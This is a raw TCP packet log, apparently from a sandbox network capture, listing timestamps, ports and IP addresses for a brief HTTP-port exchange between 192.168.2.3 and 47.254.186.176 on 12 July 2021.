Jul 12, 2021 10:28:46.488965034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488986969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.488995075 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489017010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489038944 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489048004 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489069939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489092112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489130974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489152908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489181042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489188910 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489212990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489228010 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489247084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489269972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489294052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489300013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489324093 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489341974 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489356995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489378929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489402056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489411116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489434004 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489461899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489470005 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489495039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489507914 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489528894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489552021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489574909 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489588022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489610910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489630938 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489644051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489666939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489686012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.489701986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489727020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.489743948 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.490113974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490174055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.490216970 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490394115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490451097 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.490463018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490489006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490535021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490541935 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.490570068 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490596056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490622044 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.490632057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490659952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490683079 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.490699053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490726948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490741968 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.490765095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490789890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490807056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.490822077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490844965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490866899 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.490875959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490900040 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490917921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.490932941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490955114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490983009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.490989923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491013050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491029024 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491048098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491071939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491094112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491103888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491142035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491152048 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491173983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491200924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491215944 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491369963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491394997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491420031 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491429090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491452932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491473913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491487026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491511106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491535902 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491548061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491575003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491595984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491605997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491628885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491652012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491657972 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491699934 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491707087 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491731882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491754055 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491776943 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491786957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491808891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491827011 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491843939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491869926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491892099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.491906881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491951942 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.491959095 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.492362022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.492393970 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.492413998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.492434025 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.492468119 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.492477894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.492502928 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.492525101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.492557049 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.492610931 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.492644072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.492659092 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.492914915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.492942095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.492974997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493025064 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493065119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493076086 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493113995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493134975 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493160963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493168116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493208885 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493237972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493259907 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493279934 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493299007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493309975 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493331909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493350983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493361950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493385077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493402958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493422985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493472099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493479967 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493505001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493525982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493562937 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493587017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493609905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493635893 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493750095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493793964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493804932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493834972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493859053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493882895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493894100 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493920088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493940115 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.493957043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.493983030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494000912 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.494016886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494040012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494069099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494076014 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.494103909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494113922 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.494139910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494189024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494198084 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.494225979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494251966 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494272947 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.494292021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494316101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494343996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494354010 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.494378090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494388103 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.494594097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494654894 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.494672060 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494697094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494743109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.494771957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494793892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494817972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494839907 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.494887114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.494931936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.494957924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495105982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495162964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495171070 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.495194912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495218039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495234013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.495270967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495307922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495317936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.495340109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495382071 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.495402098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495428085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495451927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495471954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.495485067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495508909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495532990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495573997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.495604992 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.495625019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495665073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495687962 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495711088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.495722055 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495747089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495774984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495781898 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.495806932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.495822906 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.495990992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496046066 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.496068954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496093035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496114016 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496143103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496150970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.496175051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496192932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.496212959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496237040 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496257067 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.496269941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496314049 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.496324062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496433020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496471882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496501923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.496536970 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496565104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496588945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496599913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.496628046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496643066 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.496665955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496715069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496722937 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.496747971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496769905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496793985 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.496906996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496932030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496953964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496963024 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.496987104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.496995926 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.497018099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497061014 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497070074 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.497128010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497154951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497176886 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.497360945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497411013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497426033 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.497518063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497565985 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.497631073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497654915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497673988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497690916 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497720957 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.497746944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497756958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.497780085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497802973 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497828007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497834921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.497855902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497872114 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.497886896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497909069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497931004 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497941017 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.497962952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.497987032 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.497998953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498025894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498048067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498068094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498079062 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.498099089 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.498447895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498478889 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498500109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498512030 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.498533964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498553038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498564005 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.498624086 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.498776913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498805046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498828888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498850107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498876095 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.498887062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498912096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498923063 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.498946905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498970032 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.498977900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.498999119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499007940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499028921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499051094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499057055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499062061 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499105930 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499131918 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499371052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499394894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499420881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499432087 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499454975 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.499478102 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.499491930 CEST	80	49720	47.254.186.176	192.168.2.3
